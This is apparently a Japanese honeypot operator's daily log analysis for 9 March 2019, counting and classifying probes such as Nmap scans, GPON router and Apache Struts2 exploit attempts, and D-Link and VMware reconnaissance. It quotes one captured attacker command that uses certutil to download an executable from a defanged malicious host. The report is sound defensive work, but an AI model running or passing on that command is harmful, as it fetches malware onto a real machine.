ハニーポットのログ分析(2019/03/09)
WOWhoneypotの2019/03/09(土) (運用276日目)の簡易分析です。
本日の総アクセス件数は58件です。送信元IP数は45IPです。
本日の主なアクセスは以下です。
・NMAPによるスキャン:5件
どれもweb上に公開されているスクリプトを集めて実行しているだけと思われます。
うち、3つは存在しないことが前提のパスに対して来ているので、ハニーポットとバレ内容にするには、404を返すようにした方が良いと思われます。
GET /NmapUpperCheck(数字)
GET /nmaplowercheck(数字)
GET /Nmap/folder/check(数字)
本日のドメイン名でのアクセスは以下です。
2 GET /
1 GET /robots.txt
本日のハンティングログは以下です。Struts2を狙ったものです。
3 2019-03-09 certutil.exe -urlcache -split -f hxxp://a46.bulehero[.]in/download.exe
以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 43 | 2019/3/9 | アクセス | GET / |
| 2 | 2019/3/9 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?style/ |
| 1 | 2019/3/9 | vmwareのバージョン調査 | POST /sdk |
| 1 | 2019/3/9 | クローリング | HEAD /robots.txt |
| 1 | 2019/3/9 | 調査 | HEAD / |
| 1 | 2019/3/9 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /struts2-rest-showcase/orders.xhtml |
| 1 | 2019/3/9 | Apache Mod_Statusモジュール利用の調査 | GET /server-status |
| 1 | 2019/3/9 | クローリング | GET /robots.txt |
| 1 | 2019/3/9 | NMAPによるスキャン | GET /NmapUpperCheck1552132724 |
| 1 | 2019/3/9 | NMAPによるスキャン | GET /nmaplowercheck1552132724 |
| 1 | 2019/3/9 | NMAPによるスキャン | GET /Nmap/folder/check1552132724 |
| 1 | 2019/3/9 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.do |
| 1 | 2019/3/9 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
| 1 | 2019/3/9 | D-Linkルータの脆弱性(CVE-2015-2051)の調査 | GET /HNAP1 |
| 1 | 2019/3/9 | Trane Tracer SC HVACの調査 | GET /evox/about |
以上です。
